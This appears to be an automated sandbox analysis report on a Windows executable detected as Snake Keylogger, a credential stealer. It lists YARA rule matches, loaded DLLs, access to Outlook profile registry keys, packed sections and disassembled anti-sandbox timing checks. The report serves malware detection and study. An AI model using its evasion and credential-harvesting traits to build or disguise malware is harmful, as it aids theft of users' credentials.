                      Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@3/3
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_004019F0 OleInitialize,_getenv,CreateToolhelp32Snapshot,CloseHandle,_malloc,_memset,_memset,_malloc,_memset,LoadLibraryA,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,0_2_004019F0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCommand line argument: 08A0_2_00413780
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: x8M2g1Xxhz.exe, 00000000.00000003.1545692849.0000000005C6F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004DCE000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004E0D000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: x8M2g1Xxhz.exeVirustotal: Detection: 59%
                      Source: x8M2g1Xxhz.exeReversingLabs: Detection: 87%
                      Source: x8M2g1Xxhz.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: x8M2g1Xxhz.exeStatic file information: File size 2841088 > 1048576
                      Source: x8M2g1Xxhz.exeStatic PE information: Raw size of tzvdltub is bigger than: 0x100000 < 0x27e800
                      Source: Binary string: _.pdb source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeUnpacked PE file: 0.2.x8M2g1Xxhz.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;tzvdltub:EW;dqypilex:EW; vs :ER;.rsrc:W;.idata :W;tzvdltub:EW;dqypilex:EW;
                      Source: initial sampleStatic PE information: section where entry point is pointing to: dqypilex
                      Source: x8M2g1Xxhz.exeStatic PE information: section name:
                      Source: x8M2g1Xxhz.exeStatic PE information: section name: .idata
                      Source: x8M2g1Xxhz.exeStatic PE information: section name: tzvdltub
                      Source: x8M2g1Xxhz.exeStatic PE information: section name: dqypilex
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043A042 push 76F90AE0h; mov dword ptr [esp], edx0_2_0043A3A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043A042 push edx; mov dword ptr [esp], eax0_2_0043A809
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00611063 push 12D75310h; mov dword ptr [esp], ebp0_2_00611077
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0067387E push edi; ret 0_2_0067388D
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00470802 push eax; mov dword ptr [esp], 06F5FC00h0_2_0047086B
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00470802 push 1F639FDCh; mov dword ptr [esp], edx0_2_0047092D
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00470802 push edx; mov dword ptr [esp], 7F3F88E6h0_2_00470964
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043D018 push edx; mov dword ptr [esp], eax0_2_0043D034
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043D018 push edi; mov dword ptr [esp], 3FCF247Ah0_2_0043D040
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0060D803 push ebx; mov dword ptr [esp], 31CD9C01h0_2_0060D834
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0060D803 push edi; mov dword ptr [esp], 26C8D451h0_2_0060D87F
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0060D803 push ebp; mov dword ptr [esp], eax0_2_0060D90A
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_006AB800 push ebx; mov dword ptr [esp], ecx0_2_006AB841
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_006408EF push eax; mov dword ptr [esp], esi0_2_0064091E
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043C8CD push edx; mov dword ptr [esp], eax0_2_0043C8DC
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043C88A push 132BA8BDh; mov dword ptr [esp], edx0_2_0043D486
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0062A883 push ebp; mov dword ptr [esp], esi0_2_0062A8E3
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043C8A7 push ebp; mov dword ptr [esp], edx0_2_0043C8AF
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043C8A7 push 1193CAACh; mov dword ptr [esp], esi0_2_0043D12E
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00423149 push eax; ret 0_2_00423179
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043B905 push ebp; mov dword ptr [esp], esi0_2_0043B90B
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push ebx; mov dword ptr [esp], eax0_2_005A112E
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push esi; mov dword ptr [esp], ebp0_2_005A1157
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push eax; mov dword ptr [esp], edi0_2_005A1197
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push edi; mov dword ptr [esp], edx0_2_005A122A
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push eax; mov dword ptr [esp], 2F822171h0_2_005A126B
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push edx; mov dword ptr [esp], esi0_2_005A12B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push 12F77D0Dh; mov dword ptr [esp], ebx0_2_005A12C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push 115BFBDFh; mov dword ptr [esp], esi0_2_005A12D2
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push ebp; mov dword ptr [esp], ecx0_2_005A1306
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C push esi; mov dword ptr [esp], 0344E57Bh0_2_005A13BB
                      Source: x8M2g1Xxhz.exeStatic PE information: section name: entropy: 7.0329103548795775
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5A0C3B second address: 5A0C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8594h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B43C4 second address: 5B43CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B46B4 second address: 5B46B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B4818 second address: 5B4822 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC218F099B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B4959 second address: 5B4975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2192E8596h 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B7D27 second address: 5B7DA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FC218F099C2h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FC218F099C1h 0x0000001a jbe 00007FC218F099B6h 0x00000020 popad 0x00000021 popad 0x00000022 nop 0x00000023 call 00007FC218F099BDh 0x00000028 or dword ptr [ebp+136331A5h], ebx 0x0000002e pop edx 0x0000002f push 00000000h 0x00000031 clc 0x00000032 push 31AB26D0h 0x00000037 pushad 0x00000038 jnc 00007FC218F099C1h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B7DA8 second address: 5B7E09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 31AB2650h 0x0000000e xor edi, dword ptr [ebp+13632E05h] 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FC2192E8588h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov dword ptr [ebp+13632116h], ebx 0x00000036 mov edi, dword ptr [ebp+13632C1Ah] 0x0000003c mov ecx, 66CBEF03h 0x00000041 push 00000000h 0x00000043 or dword ptr [ebp+136331B4h], edi 0x00000049 push 00000003h 0x0000004b mov esi, dword ptr [ebp+13633091h] 0x00000051 push AC31A086h 0x00000056 pushad 0x00000057 push esi 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B7E09 second address: 5B7E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B7EBE second address: 5B7EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B7EC2 second address: 5B7F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jl 00007FC218F099CCh 0x00000010 jmp 00007FC218F099C6h 0x00000015 push 00000000h 0x00000017 sbb di, 3652h 0x0000001c mov esi, dword ptr [ebp+13632758h] 0x00000022 push 3D505B41h 0x00000027 jc 00007FC218F099C9h 0x0000002d xor dword ptr [esp], 3D505BC1h 0x00000034 call 00007FC218F099C5h 0x00000039 pop ecx 0x0000003a push 00000003h 0x0000003c mov cx, dx 0x0000003f mov edi, dword ptr [ebp+13632EF1h] 0x00000045 push 00000000h 0x00000047 jnp 00007FC218F099C3h 0x0000004d push 00000003h 0x0000004f mov esi, dword ptr [ebp+13632F1Dh] 0x00000055 call 00007FC218F099B9h 0x0000005a push esi 0x0000005b pushad 0x0000005c jl 00007FC218F099B6h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 5B7F6B second address: 5B7F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
